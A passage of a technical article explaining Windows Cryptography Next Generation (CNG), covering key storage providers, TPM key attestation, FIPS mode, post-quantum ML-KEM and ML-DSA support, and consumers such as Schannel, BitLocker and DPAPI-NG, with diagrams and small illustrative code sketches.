participant Disk as %APPDATA%\Microsoft\Crypto\Keys\

App->>Router: NCryptOpenStorageProvider("Microsoft Software Key Storage Provider")
Router-->>App: hProvider
App->>Router: NCryptCreatePersistedKey(hProvider, "RSA", "MyKey", 2048, ...)
Router->>KSP: dispatch via registered KSP entry points
KSP->>LSA: LRPC: generate key, return handle
LSA->>Disk: write DPAPI-wrapped private blob
LSA-->>KSP: ok
KSP-->>Router: hKey
Router-->>App: hKey
App->>Router: NCryptSignHash(hKey, digest)
Router->>KSP: forward
KSP->>LSA: LRPC: sign with isolated key
LSA-->>KSP: signature
KSP-->>Router: signature
Router-->>App: signature

Two facts about that diagram matter. First, the private key bits never enter the calling process. They are generated inside the LSA process and the calling application only ever receives a handle and the eventual signature. Second, the LRPC hop is real: it costs roughly 30 to 100 microseconds per call on modern hardware. For bulk symmetric encryption you would not want this overhead, which is why CNG's design pushes you toward BCrypt for symmetric work and reserves NCrypt for the rarer, smaller, and more sensitive operations on long-lived asymmetric keys.

The LSA key-isolation process is lsaiso.exe on systems with Credential Guard enabled, hosted inside the Virtualization-Based Security (VBS) trustlet boundary. On systems without VBS, the role is played by lsass.exe itself. Either way, key material does not enter the application's address space.
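To see why the hop rules out bulk work, it helps to put numbers on it. The sketch below only does arithmetic on the 30 to 100 microsecond range quoted above; the 4 KiB chunk size and the 1 GiB payload are assumptions picked for illustration, and the helper names are hypothetical.

```python
def max_calls_per_second(latency_us):
    """Upper bound on serial calls per second if each call pays latency_us."""
    return 1_000_000 / latency_us


def hop_overhead_seconds(total_bytes, chunk_bytes, latency_us):
    """Time spent purely on per-call hops when a payload is processed in chunks."""
    calls = -(-total_bytes // chunk_bytes)  # ceiling division
    return calls * latency_us / 1_000_000


if __name__ == "__main__":
    one_gib = 2**30
    for latency in (30, 100):
        print(
            latency,
            round(max_calls_per_second(latency)),
            round(hop_overhead_seconds(one_gib, 4096, latency), 2),
        )
```

Under those assumptions a single thread tops out between roughly 10,000 and 33,000 calls per second, and pushing 1 GiB through in 4 KiB chunks would spend about 8 to 26 seconds on hops alone, before any cryptography happens.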

NCrypt is also where the asymmetric algorithms live in their persistent form. The Microsoft Software Key Storage Provider claims RSA keys from 512 to 16384 bits in 64-bit increments, DSA, DH, and ECDSA/ECDH on the NIST P-256, P-384, and P-521 curves [@learn-microsoft-com-and-retrieval]. Windows 11 24H2 added ML-KEM at the 512, 768, and 1024 parameter sets and ML-DSA at the 44, 65, and 87 parameter sets to the Software KSP's repertoire.

The split between BCrypt and NCrypt is sometimes confusing because there is overlap. You can sign with BCrypt's BCryptSignHash if you generated an ephemeral key pair. You can also sign with NCrypt's NCryptSignHash if the key is persisted in a KSP. The rule of thumb is: if the key needs to survive the process, use NCrypt; if it does not, use BCrypt. Real-world Windows code skews heavily toward NCrypt for asymmetric operations because almost every interesting asymmetric key has an associated certificate, and certificates outlive processes.

Note: The four Microsoft KSP name strings are MS_KEY_STORAGE_PROVIDER (Software), MS_PLATFORM_KEY_STORAGE_PROVIDER (TPM/Pluton), MS_SMART_CARD_KEY_STORAGE_PROVIDER, and MS_NGC_KEY_STORAGE_PROVIDER (Next Generation Credentials, used by Windows Hello). Typo any of these and you silently fall through to the Software KSP, which is a recurring source of "why is my key on disk instead of in the TPM" incident reports.

The router lets the application speak one language and have the storage backend vary. That makes the KSP plug-in model the most interesting piece of the architecture, and it deserves its own section.

4. The KSP model: one API, many places to keep keys

A KSP is a DLL on disk and an entry in the registry. The DLL exports a fixed set of function pointers that mirror NCrypt's API. The registry entry under HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Microsoft Software Key Storage Provider (and its siblings) tells ncrypt.dll which DLL to load when an application asks for a provider by name. That is the whole interface contract. If you can produce a DLL that implements the entry points and you can install a registry entry, you have a CNG KSP.

The platform comes with four. They sit on a spectrum from "your operating system is the entire trust boundary" to "the keys live on a separate piece of silicon and only signatures come back."

flowchart LR
A["Microsoft Software KSP -- private keys on disk -- (DPAPI-wrapped)"] --> B["Microsoft Platform Crypto Provider -- TPM 2.0 or Pluton -- on-CPU silicon"]
B --> C["Microsoft Smart Card KSP -- removable hardware token -- (PIV, CAC, YubiKey)"]
C --> D["Third-party HSM KSP -- Thales Luna, Entrust nShield, -- YubiHSM 2, AWS CloudHSM"]
A -.-> A1["~10^4 RSA-2048 sign/sec -- FIPS 140-2 L1"]
B -.-> B1["~1-10 sign/sec -- TPM vendor cert"]
C -.-> C1["~1-5 sign/sec -- card vendor cert"]
D -.-> D1["~10^2-10^4 sign/sec -- FIPS 140-2/-3 L3 typical"]

4.1 The Microsoft Software KSP

The default. If you pass NULL for the provider name in NCryptOpenStorageProvider, you get this one. It stores per-user private keys at %APPDATA%\Microsoft\Crypto\Keys\ and per-machine keys at %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\SystemKeys\, with each file-level blob further protected by DPAPI under either the user master key or the LocalSystem (S-1-5-18) master key. The private-key operations dispatch through LRPC into the LSA key-isolation process so that even with administrator privileges on the machine, naive code-injection into the application's address space does not yield key bits.

The Microsoft Software KSP is also the only KSP that runs inside the LSA key-isolation process. Third-party KSPs run in the calling application's process. That difference matters enormously for the threat model. Microsoft notes this explicitly: third-party KSPs "do not run inside the LSA process" [@learn-microsoft-com-and-retrieval]. If you are a third-party KSP that talks to remote HSM hardware, the isolation comes from the HSM itself, not from any Windows process boundary.

4.2 The Microsoft Platform Crypto Provider (TPM and Pluton)

The KSP that answers to MS_PLATFORM_KEY_STORAGE_PROVIDER is the TPM's face to CNG. When you call NCryptCreatePersistedKey against it, the TPM 2.0 chip itself [@learn-microsoft-com-tpm-fundamentals] generates the key under the protection of its Storage Root Key. The private bits never leave the chip. The application gets back a handle whose only operations are sign, decrypt, and key derivation -- the private key cannot be exported, and that property is enforced by physics, not by software policy.

Key idea: The Platform Crypto Provider is the place where CNG stops trusting the operating system and starts trusting a separate piece of silicon. Every TPM-backed key in Windows -- BitLocker's Volume Master Key wrapping, Windows Hello credentials, AD CS attestation-enrolled machine identities -- enters and exits through this single KSP name.

Microsoft Pluton, the security processor that first shipped in 2022 on AMD Ryzen 6000 and Snapdragon 8cx Gen 3 silicon and later reached Intel Core Ultra Series 2, is exposed to Windows as a TPM 2.0 device behind the same Platform Crypto Provider name [@learn-microsoft-com-security-processor]. Application code that worked against a discrete TPM works against Pluton with no changes. Pluton's wins are at the supply-chain layer (no SPI bus to physically tap between the chip and the CPU) and the firmware-update layer (Pluton firmware ships via Windows Update). The Windows-facing API is intentionally identical.

4.3 The Microsoft Smart Card KSP

MS_SMART_CARD_KEY_STORAGE_PROVIDER is a single KSP that routes to whichever vendor minidriver claims the inserted card. The minidriver model is Microsoft's plug-in layer below the KSP layer: smart-card vendors do not write CNG KSPs, they write minidrivers, and Microsoft's single KSP fans the calls out to them via the APDU protocol. Cards that follow Microsoft's Generic Identity Device Specification (GIDS) [@learn-microsoft-com-device-specification] work without a vendor minidriver. Cards that do not, including most US federal PIV cards before about 2015, ship vendor-specific minidrivers.

This is the layer that powers Windows Hello for Business "virtual smart card" credentials, which present a TPM-backed key through the smart-card path because so much enterprise software already knew how to talk to PIV-style cards.

4.4 Third-party HSM and security-key KSPs

YubiHSM 2, Thales Luna, Entrust nShield, AWS CloudHSM Client for Windows, and various cloud-KMS bridges all ship CNG KSPs. The KSP DLL pretends to be a local provider and proxies operations across whatever transport the device uses -- USB for a YubiHSM, PCIe or TCP for a Luna, HTTPS for a cloud HSM. Latency varies from microseconds for a USB device to a few milliseconds for a network HSM. The application code that calls NCryptSignHash does not change.

For an internal Active Directory Certificate Services CA, the KSP choice is the entire trust story. A CA whose root key lives in the Software KSP can have that key extracted by any administrator. A CA whose root lives in a FIPS 140-2 Level 3 HSM KSP requires physical access to the HSM (often with multi-person key ceremonies) to recover the key. The application code in `certutil` is identical in both cases. The audit story is not.

5. The TPM KSP, attestation, and the hardware boundary

A TPM-bound key is a useful key, but a TPM-bound key with an attestation statement is a different kind of asset entirely. The Trusted Platform Module supports a primitive called key attestation: the TPM can sign a statement that says, "this key was generated inside me, I will never let it out, and here is a chain of trust back to my Endorsement Key that proves I am a real TPM made by a real vendor." A certificate authority that requires this attestation can refuse to issue a certificate for any key that did not come from inside a TPM.

Active Directory Certificate Services supports exactly this flow as "TPM key attestation" [@learn-microsoft-com-key-attestation]. The flow involves three keys: an Endorsement Key (EK) burned into the TPM at manufacture, an Attestation Identity Key (AIK) derived from the EK and certified by Microsoft or by the enterprise PKI, and the application key being attested. The AIK signs a statement covering the application key's properties; the CA verifies the AIK certificate chain and the statement, and only then issues a certificate.

flowchart TD
EK["Endorsement Key (EK) -- burned into TPM at manufacture -- vendor cert from Intel/AMD/etc."]
AIK["Attestation Identity Key (AIK) -- generated in TPM, certified by -- Microsoft EK CA or enterprise PKI"]
APPK["Application key -- generated in TPM via -- NCryptCreatePersistedKey"]
STMT["Attestation statement -- signed by AIK"]
CA["Enterprise CA (AD CS) -- verifies AIK chain -- and attestation"]
CERT["X.509 certificate -- issued to application key"]

EK --> AIK
AIK --> STMT
APPK --> STMT
STMT --> CA
CA --> CERT

The CNG-facing API for this is the property bag on a NCRYPT_KEY_HANDLE. After creating the key, the application calls NCryptGetProperty with NCRYPT_KEY_ATTESTATION_PROPERTY (and friends) to retrieve the attestation blob. The CA receives the blob in the certificate request and validates it against Microsoft's published EK CA roots. The whole protocol fits inside the standard certificate-enrollment flow.

Key idea: A software KSP can promise that a key is non-exportable. A TPM KSP can prove it.

Throughput is the price. A typical TPM 2.0 chip performs single-digit RSA-2048 signatures per second. Pluton-based platforms are in the same neighborhood. Any architecture that wants to do a TPM signature on every HTTP request will fall over almost immediately. The TPM is the right home for one signature per session, per boot, or per logon -- not one per packet.

Key migration between TPMs is essentially impossible by design. Replace a motherboard, and any keys that were sealed to the old TPM's Storage Root Key are gone. This is the same property that makes BitLocker safe against motherboard theft (the recovery key, escrowed elsewhere, is the only way back) and the same property that makes TPM-bound device identities a key-management headache during hardware refresh cycles.

There is a deeper, more philosophical reason to use the TPM that the API does not advertise. Software keys are bounded by the kernel's process-isolation guarantees. Any kernel-level attacker, any user with SeDebugPrivilege, or any code injected into lsass.exe can in principle reach key material. The provably stronger bound -- keys that no OS-level code can ever read -- requires an off-CPU hardware boundary. CNG's own design notes acknowledge this when they say CNG "is designed to be usable as a component in a FIPS level 2 validated system" [@learn-microsoft-com-cng-features]: software-only isolation maps to FIPS 140-2 Levels 1 and 2; hardware boundaries are required for Level 3 and above.

6. FIPS 140 mode, compliance, and the one-bit toggle

There is a registry value at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled. When it is set to 1 (or when the equivalent Group Policy "System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing" is enabled), Schannel and CNG callers refuse to use algorithms that fall outside the FIPS-approved set. RC4 disappears. MD5 disappears. SHA-1 disappears for new signatures (though not for legacy verification). TLS suites that rely on any of those are removed from the negotiation list.

The toggle is a runtime gate, not a code path. The underlying modules -- bcryptprimitives.dll and cng.sys [@learn-microsoft-com-140-windows11] -- are the same modules either way. They have been submitted to the Cryptographic Module Validation Program [@csrc-nist-gov-modules-search] and validated against the FIPS 140-2 standard [@csrc-nist-gov-2-final]. The toggle simply tells those modules that the calling environment expects FIPS-mode behavior, and the modules then refuse the non-approved algorithms.

FIPS 140: A US federal certification program (Federal Information Processing Standard 140) that subjects a cryptographic module to laboratory testing and NIST review. Validated modules receive a public CMVP certificate. Federal agencies, FedRAMP/CMMC contractors, and most regulated industries can only use validated modules in approved configurations. FIPS 140-2 and the newer FIPS 140-3 differ mainly in test methodology and the standard's own ISO/IEC alignment.

Two current Windows 11 certificate numbers are worth memorizing. CMVP certificate #4825 covers bcryptprimitives.dll [@csrc-nist-gov-certificate-4825]. CMVP certificate #4766 covers cng.sys [@csrc-nist-gov-certificate-4766], the kernel-mode primitives. Both are FIPS 140-2 Level 1 modules with a sunset date of September 21, 2026 under the CMVP's transition rules. Microsoft maintains the per-version FIPS validation portal for Windows 11 [@learn-microsoft-com-140-windows11], which lists the active certificates per build and the algorithms each one covers.

The cadence mismatch is the open story here. Windows 11 ships a feature update roughly once a year (22H2, 23H2, 24H2), with monthly servicing updates in between. CMVP validation of a new build's primitives DLL and kernel module typically takes 12 to 24 months. Federal customers, FedRAMP-bound cloud tenants, and CMMC contractors cannot run a Windows build that does not have an active FIPS certificate covering its cryptographic modules. Microsoft submits 140-3 evidence for newer modules, but as of mid-2026 no public 140-3 certificate is visible on CMVP for the bcryptprimitives.dll shipping in Windows 11 24H2.

Note: Setting FIPSAlgorithmPolicy\Enabled = 1 is necessary for FIPS compliance, but not sufficient. The validated configuration also requires that Windows be a covered build (with an active certificate), that you avoid third-party crypto libraries that have not been validated, and that algorithm choices stay inside the per-certificate Approved Mode list. A Windows version without an active certificate is not in compliance even with the toggle on.

The toggle also does not change the SymCrypt implementations. AES-GCM is still AES-GCM. What changes is which APIs the caller is allowed to reach. From the application's point of view, the symptom of FIPS mode is STATUS_NOT_SUPPORTED on BCryptOpenAlgorithmProvider(L"RC4", ...). From an auditor's point of view, the symptom is the absence of any disallowed primitive call in the binary.
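The "runtime gate, not a code path" idea can be modelled in a few lines. What follows is a toy sketch, not Windows code: `openAlgorithm`, the two algorithm sets, and the returned status strings are hypothetical stand-ins that only mimic the behavior described above, where the same implementations exist either way and a policy check sits in front of them.

```javascript
// Toy model of a FIPS-style runtime gate. Nothing here calls a Windows API;
// the function name and both algorithm lists are illustrative assumptions.
const IMPLEMENTED = new Set(["AES", "SHA256", "SHA384", "RSA", "ECDSA", "RC4", "MD5"]);
const FIPS_APPROVED = new Set(["AES", "SHA256", "SHA384", "RSA", "ECDSA"]);

function openAlgorithm(name, fipsEnabled) {
  if (!IMPLEMENTED.has(name)) {
    return { ok: false, status: "STATUS_NOT_FOUND" };
  }
  // The gate: the implementation is still present, but the caller cannot reach it.
  if (fipsEnabled && !FIPS_APPROVED.has(name)) {
    return { ok: false, status: "STATUS_NOT_SUPPORTED" };
  }
  return { ok: true, status: "STATUS_SUCCESS", algorithm: name };
}

console.log(openAlgorithm("RC4", false).status);
console.log(openAlgorithm("RC4", true).status);
console.log(openAlgorithm("AES", true).status);
```

The point of the model is that flipping `fipsEnabled` changes which names are reachable, not what any reachable algorithm computes.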

7. The post-quantum slide: ML-KEM, ML-DSA, and the agility test

The piece of CNG that earns its "agility" billing is the post-quantum transition.

NIST opened the Post-Quantum Cryptography standardization process in 2016 and ran four rounds of public evaluation [@csrc-nist-gov-quantum-cryptography] before issuing the first final standards in August 2024. FIPS 203 standardizes ML-KEM (formerly CRYSTALS-Kyber), a module-lattice key encapsulation mechanism [@nvlpubs-nist-gov-fips-nistfips203pdf]. FIPS 204 standardizes ML-DSA (formerly CRYSTALS-Dilithium), a module-lattice digital signature algorithm [@csrc-nist-gov-204-final]. Microsoft Research had been working on lattice cryptography for years [@microsoft-com-quantum-cryptography], and the public CNG implementations followed quickly: Windows 11 24H2 ships ML-KEM and ML-DSA as first-class CNG algorithms.

Here is the surprising part: the CNG API surface did not change. Adding ML-KEM was a matter of registering new algorithm identifier strings -- BCRYPT_MLKEM_ALGORITHM, the parameter sets BCRYPT_MLKEM_PARAMETER_SET_512, BCRYPT_MLKEM_PARAMETER_SET_768, BCRYPT_MLKEM_PARAMETER_SET_1024 -- in the CNG algorithm-identifier registry [@learn-microsoft-com-algorithm-identifiers]. The opening dance for an ML-KEM key encapsulation looks exactly like the opening dance for an ECDH key agreement, except for the string.

{`
// Mirrors the BCrypt pattern shown in the Microsoft sample
// "Using ML-KEM with CNG for Key Exchange"

const hAlg = BCryptOpenAlgorithmProvider("ML-KEM", null, 0);

const hKeyPair = BCryptGenerateKeyPair(hAlg, 0, 0);
BCryptSetProperty(hKeyPair, "ParameterSetName", "ML-KEM-768");
BCryptFinalizeKeyPair(hKeyPair, 0);

const pubBlob = BCryptExportKey(hKeyPair, "MLKEMPUBLICBLOB");

// Sender side: encapsulate to recipient's public key
const recipPub = BCryptImportKeyPair(hAlg, "MLKEMPUBLICBLOB", pubBlob);
const { ciphertext, sharedSecret: ssA } = BCryptEncapsulate(recipPub);

// Recipient side: decapsulate with the matching private key
const ssB = BCryptDecapsulate(hKeyPair, ciphertext);

// ssA === ssB
`}

That code is structurally identical to a 2007-era ECDH session. The string changes, the blob format changes, and the wire-format sizes change considerably. ML-KEM ciphertexts at the 512, 768, and 1024 parameter sets are 768, 1088, and 1568 bytes respectively, with public keys of 800, 1184, and 1568 bytes per FIPS 203 [@csrc-nist-gov-203-final]. ML-DSA signatures at parameter sets 44, 65, and 87 are 2420, 3309, and 4627 bytes per FIPS 204 [@csrc-nist-gov-204-final]. For comparison, an ECDSA P-256 signature is 64 bytes and an X25519 public key is 32 bytes. The PQC blowup is well over an order of magnitude (an ML-KEM-768 public key is 37 times the size of an X25519 public key, and an ML-DSA-44 signature is about 38 times the size of an ECDSA P-256 signature), and that has knock-on consequences for every protocol that carries certificates or handshakes on the wire.
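To put numbers on the blowup, the short sketch below divides the post-quantum sizes quoted above by their classical counterparts. The byte counts are copied from the paragraph; the object and function names are just illustrative.

```javascript
// Sizes in bytes, taken from the figures quoted in the text (FIPS 203 / FIPS 204).
const classical = { x25519PublicKey: 32, ecdsaP256Signature: 64 };
const mlKemPublicKey = { 512: 800, 768: 1184, 1024: 1568 };
const mlDsaSignature = { 44: 2420, 65: 3309, 87: 4627 };

// Ratio rounded to one decimal place.
function ratio(pqSize, classicalSize) {
  return Math.round((pqSize / classicalSize) * 10) / 10;
}

function ratios(table, classicalSize) {
  return Object.fromEntries(
    Object.entries(table).map(([set, size]) => [set, ratio(size, classicalSize)])
  );
}

const keyRatios = ratios(mlKemPublicKey, classical.x25519PublicKey);
const sigRatios = ratios(mlDsaSignature, classical.ecdsaP256Signature);

console.log(keyRatios); // { '512': 25, '768': 37, '1024': 49 }
console.log(sigRatios); // { '44': 37.8, '65': 51.7, '87': 72.3 }
```

Even the smallest parameter sets land at 25x or more, which is why handshake and certificate-chain sizes dominate PQC deployment discussions.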

The reason ML-KEM matters before any large quantum computer exists is the harvest-now, decrypt-later attack: an adversary recording today's TLS sessions can decrypt them years from now if the long-lived key-exchange material was only protected by RSA or ECDH. Long-lived secrets transmitted over the wire today -- medical records, source code, government cables -- have a confidentiality lifetime measured in decades. The motivation for hybrid PQ key exchange is that you cannot un-record traffic.

Most TLS-PQ deployments use hybrid groups: classical X25519 combined with ML-KEM-768, with the shared secret derived from both. The motivation is hedging rather than size (a hybrid key share is larger still): if either component breaks, the other one still holds. The IETF draft draft-kwiatkowski-tls-ecdhe-mlkem [@learn-microsoft-com-mlkem-examples] defines the X25519MLKEM768 group with IANA codepoint 0x11EC, and Chrome, Cloudflare, and AWS shipped support in production in 2024. OpenJDK JEP 527 [@openjdk-org-jeps-527] tracks the equivalent work for Java's TLS stack. Schannel in Windows 11 24H2 can negotiate ML-KEM through CNG, but Microsoft has not publicly committed to a default-on hybrid group at the Schannel layer as of mid-2026.
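A minimal sketch of "the shared secret derived from both" follows. It makes several assumptions: fixed byte patterns stand in for the real X25519 and ML-KEM outputs, a single HKDF-SHA256 call over the concatenation stands in for the TLS 1.3 key schedule, and the `hybrid-demo` label is hypothetical. It illustrates the dependency structure only, not the wire protocol.

```javascript
const { hkdfSync } = require("node:crypto");

// Derive one 32-byte key from two component secrets by concatenating them
// and running HKDF. Both inputs feed the output, so an attacker needs both.
function combineHybrid(mlkemSecret, x25519Secret) {
  const ikm = Buffer.concat([mlkemSecret, x25519Secret]);
  const okm = hkdfSync("sha256", ikm, Buffer.alloc(32), Buffer.from("hybrid-demo"), 32);
  return Buffer.from(okm).toString("hex");
}

// Stand-in secrets (real ones come from ML-KEM decapsulation and X25519).
const mlkemSecret = Buffer.alloc(32, 0x11);
const x25519Secret = Buffer.alloc(32, 0x22);

const sessionKey = combineHybrid(mlkemSecret, x25519Secret);
const wrongMlkem = combineHybrid(Buffer.alloc(32, 0x33), x25519Secret);
const wrongX25519 = combineHybrid(mlkemSecret, Buffer.alloc(32, 0x44));

// Knowing only one of the two component secrets yields a different key.
console.log(sessionKey !== wrongMlkem, sessionKey !== wrongX25519);
```

An adversary who later breaks X25519 with a quantum computer recovers only one of the two inputs, and the derived key stays out of reach as long as ML-KEM holds (and vice versa).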

On a Windows 11 24H2 machine, the following PowerShell snippet asks CNG for its registered algorithms:

[System.Security.Cryptography.CngAlgorithm]::new("ML-KEM")
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\Default\0010'

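The first line only wraps the name in a CngAlgorithm object (the constructor does not validate it against a provider), so the second line, which walks the configuration store, is the real check. If the keys ML-KEM and ML-DSA appear, your kernel-mode and user-mode primitives are 24H2-current.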

The bigger structural lesson is that two decades of "cryptographic agility" claims actually paid off. The PQC transition required a 24H2 update, not a CNG redesign.

8. Where CNG actually shows up: TLS, BitLocker, and friends

The argument for an OS-level cryptographic API stands or falls on what runs on top of it. Every modern Windows component that touches cryptography is a CNG consumer.

Schannel: The Windows implementation of TLS and DTLS, exposed through the SSPI (Security Support Provider Interface). Schannel handles the TLS protocol state machine, certificate validation, and cipher-suite negotiation, then delegates the actual cryptography to BCrypt and NCrypt. The cipher-suite priority list and protocol-version controls are configured per Windows version, often via Group Policy.

Schannel, the Windows TLS stack, sits directly above CNG. The Schannel cipher-suite list is its own per-version object, documented at the Schannel cipher-suites portal [@learn-microsoft-com-in-schannel]. For TLS 1.2 and earlier, the order is administered via the registry key HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\SSL\00010002 (the "Functions" value) or the Group Policy "SSL Cipher Suite Order." For TLS 1.3, the three suites (TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256, TLS_CHACHA20_POLY1305_SHA256) are not user-orderable; Schannel hard-codes the priority. TLS 1.0 and TLS 1.1 are off by default in Windows 11 23H2 and later, per Microsoft's August 2023 deprecation announcement [@techcommunity-microsoft-com-windows-3887947].

flowchart TD
    App["Application -- (WinHTTP, HttpClient, browser, ...)"]
    SSPI["SSPI / CredSSP layer"]
    Schannel["Schannel -- protocol state machine -- cipher-suite negotiation"]
    BCrypt["BCrypt -- AES-GCM, SHA-2/3, HKDF, RNG"]
    NCrypt["NCrypt -- server cert private key sign -- client cert auth"]
    KSP["KSP (Software / TPM / -- Smart Card / HSM)"]

    App --> SSPI
    SSPI --> Schannel
    Schannel --> BCrypt
    Schannel --> NCrypt
    NCrypt --> KSP

BitLocker is the canonical NCrypt-and-TPM consumer. The Full Volume Encryption Key (FVEK) is generated and stored encrypted on disk. The Volume Master Key (VMK) wraps the FVEK and is itself wrapped by one or more "protectors": the TPM, a recovery password, a startup PIN, a USB startup key. The TPM protector is an NCrypt-style operation against the Platform Crypto Provider, sealed to a set of Platform Configuration Register (PCR) measurements that capture the boot state. If anything in the early boot chain changes, the PCRs do not match, the TPM refuses to unwrap the VMK, and BitLocker falls back to recovery.
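The PCR-sealing behavior can be sketched as a toy model. The assumptions are loud ones: a plain object stands in for the TPM-sealed blob (a real TPM keeps the secret encrypted under a key that never leaves the chip), a single PCR stands in for the set BitLocker actually uses, and the component strings are made up. The extend rule itself, new value = SHA-256(old value || measurement), is the standard TPM operation.

```javascript
const { createHash } = require("node:crypto");

// PCR extend: new value = SHA-256(old value || measurement).
function extendPcr(pcr, measurement) {
  return createHash("sha256").update(pcr).update(measurement).digest();
}

// Fold a list of boot components into one PCR value, starting from all zeros.
function measureBoot(components) {
  let pcr = Buffer.alloc(32);
  for (const component of components) {
    const measurement = createHash("sha256").update(component).digest();
    pcr = extendPcr(pcr, measurement);
  }
  return pcr;
}

// Toy "seal": remember which PCR value must be present at unseal time.
function sealVmk(vmk, expectedPcr) {
  return { vmk, expectedPcr };
}

// Toy "unseal": release the key only if the current PCR matches.
function unsealVmk(sealed, currentPcr) {
  return sealed.expectedPcr.equals(currentPcr) ? sealed.vmk : null;
}

const goodBoot = ["firmware v1", "bootmgr v1", "winload v1"];
const tamperedBoot = ["firmware v1", "bootmgr EVIL", "winload v1"];
const sealed = sealVmk("volume-master-key", measureBoot(goodBoot));

console.log(unsealVmk(sealed, measureBoot(goodBoot)));     // volume-master-key
console.log(unsealVmk(sealed, measureBoot(tamperedBoot))); // null
```

A `null` here corresponds to the case in the text where the TPM refuses to unwrap the VMK and BitLocker drops to recovery.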

Authenticode, the signature format on Windows binaries, is an NCrypt-driven workflow at signing time and a BCrypt-driven workflow at verification time. The Windows kernel verifies driver signatures, the Windows loader verifies binary signatures, and WinVerifyTrust exposes the same machinery to applications. The hash algorithm in modern Authenticode is SHA-256, which means every signed executable on the system has a SHA-256 digest computed by BCrypt at some point during validation.

Credential Guard runs the LSA isolated process (lsaiso.exe) inside the Virtualization-Based Security trustlet boundary on systems with VBS enabled. Credential Guard does not replace CNG; it relocates the Microsoft Software KSP into a stronger isolation boundary. NTLM password hashes and Kerberos TGT session keys live inside that boundary, accessible only through the standard CNG calls dispatched into the trustlet.

Windows Hello for Business uses the Platform Crypto Provider as the home for the user's gesture-protected authentication key. The biometric (or PIN) unlocks a key in the TPM; that key signs an attestation that is consumed by Azure AD or AD FS. The biometric never leaves the device.

DPAPI and DPAPI-NG are themselves built on CNG, and they deserve their own section because they are the easiest place to see how the layering pays off.

Schannel, BitLocker, EFS, Authenticode, Credential Guard, Windows Hello, DPAPI-NG, IPsec, SMB encryption, Kerberos PKINIT -- every modern Windows component is a CNG consumer.

9. DPAPI-NG: a worked example of the NCrypt model

The original Data Protection API (DPAPI), shipped with Windows 2000, was a per-user secret-protection mechanism. An application called CryptProtectData, passed a blob of secret data, and got back an encrypted blob that only the same user on the same machine could later unwrap. The mechanism was anchored in the user's logon credentials, with a master key per user and a complex backup mechanism for password resets. It worked. It also locked the secret to a single machine, which became a problem the moment users started living on more than one device.

DPAPI-NG, introduced in Windows 8 and Windows Server 2012, is the cloud-era rebuild. The CNG DPAPI documentation [@learn-microsoft-com-cng-dpapi] describes the three calls: NCryptCreateProtectionDescriptor, NCryptProtectSecret, and NCryptUnprotectSecret. The protection descriptor is a small string that names who can unwrap the data. Examples include SID=S-1-5-21-... for an Active Directory user or group, LOCAL=user for the legacy single-user behavior, WEBCREDENTIALS=... for a credential vault entry, and combinations connected by AND or OR operators.
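To make the descriptor idea concrete, here is a toy evaluator for strings of that shape. It is a sketch under stated assumptions, not the NCrypt parser: it models only `SID=` and `LOCAL=` terms, it assumes AND binds tighter than OR, and the `caller` object and the sample SIDs are hypothetical.

```javascript
// Parse "A AND B OR C" into [[A, B], [C]]: a list of OR-clauses,
// each of which is a list of TYPE=value terms that must all match.
function parseDescriptor(descriptor) {
  return descriptor.split(/\s+OR\s+/).map((clause) =>
    clause.split(/\s+AND\s+/).map((term) => {
      const idx = term.indexOf("=");
      if (idx < 1) throw new Error(`malformed term: ${term}`);
      return { type: term.slice(0, idx).trim(), value: term.slice(idx + 1).trim() };
    })
  );
}

function termMatches(term, caller) {
  if (term.type === "SID") return caller.sids.includes(term.value);
  if (term.type === "LOCAL") return caller.local === term.value;
  return false; // protector types not modelled here never match
}

// The caller may unprotect if every term of at least one clause matches.
function canUnprotect(descriptor, caller) {
  return parseDescriptor(descriptor).some((clause) =>
    clause.every((term) => termMatches(term, caller))
  );
}

const groupMember = { sids: ["S-1-5-21-1111"], local: null };
console.log(canUnprotect("SID=S-1-5-21-1111 OR LOCAL=user", groupMember));           // true
console.log(canUnprotect("SID=S-1-5-21-1111 AND SID=S-1-5-21-2222", groupMember));   // false
```

The access decision lives entirely in the descriptor string, which is why new protector types can be added without touching the three API calls.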

flowchart LR
    Plain["plaintext secret"] --> Protect["NCryptProtectSecret(descriptor, plain)"]
    Desc["descriptor: -- SID=group GUID -- OR -- LOCAL=user"] --> Protect
    Protect --> Blob["opaque blob"]
    Blob --> Unprotect["NCryptUnprotectSecret(blob)"]
    Unprotect -.->|"resolves descriptor -- via AD DC backup keys"| AD["Active Directory DC -- (DPAPI backup keys)"]
    Unprotect --> Out["plaintext secret -- on any authorized machine"]

The architectural win is that DPAPI-NG is just NCrypt with a particular protection-descriptor schema. Any KSP that can serve the key referenced by the descriptor can satisfy the unwrap. In an Active-Directory-joined environment, the AD domain controller's DPAPI backup keys allow any machine where the user (or any member of the named group) authenticates to recover the secret. The application that called NCryptProtectSecret does not need to know about backup keys, replication topology, or recovery flows. It calls NCrypt; the router and the relevant KSP do the rest.

This is the design payoff of the two-tier model. A new key-management capability (cross-machine recovery via AD-stored backup keys) becomes a new descriptor type, not a new API. The Windows team has used the same descriptor extensibility to add web-credential descriptors, container-bound descriptors, and the descriptors that protect Group Managed Service Account passwords. Each one is a private key-management concern; none of them broke the public API.

The DPAPI-NG descriptor language is small enough to read in one sitting and powerful enough to express "any member of this AD group, on any machine where that member can authenticate." That is the cloud-era access-control story that the original DPAPI never had.

10. Engineering takeaways: choosing the right tool

The decision tree for CNG usage in production code is short.

flowchart TD
    Q1{"Need persistent -- private key?"}
    Q1 -- No --> B["BCrypt -- (ephemeral key, pseudo-handle)"]
    Q1 -- Yes --> Q2{"Threat model?"}
    Q2 -- "Machine identity, -- hardware-rooted" --> P["Microsoft Platform -- Crypto Provider -- (TPM / Pluton)"]
    Q2 -- "User-bound PKI, -- removable hardware" --> S["Microsoft Smart Card KSP -- (PIV / virtual smart card)"]
    Q2 -- "High signing rate, -- regulated custody" --> H["Third-party HSM KSP -- (YubiHSM / Luna / nShield)"]
    Q2 -- "Default, -- portable, fast" --> SW["Microsoft Software KSP"]
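The same tree reads naturally as a small function. In this sketch the threat-model labels (`machine-identity`, `user-pki`, `high-rate-regulated`) are hypothetical names chosen for illustration; the returned strings for the Microsoft providers are the provider names as they appear in `certutil` output.

```javascript
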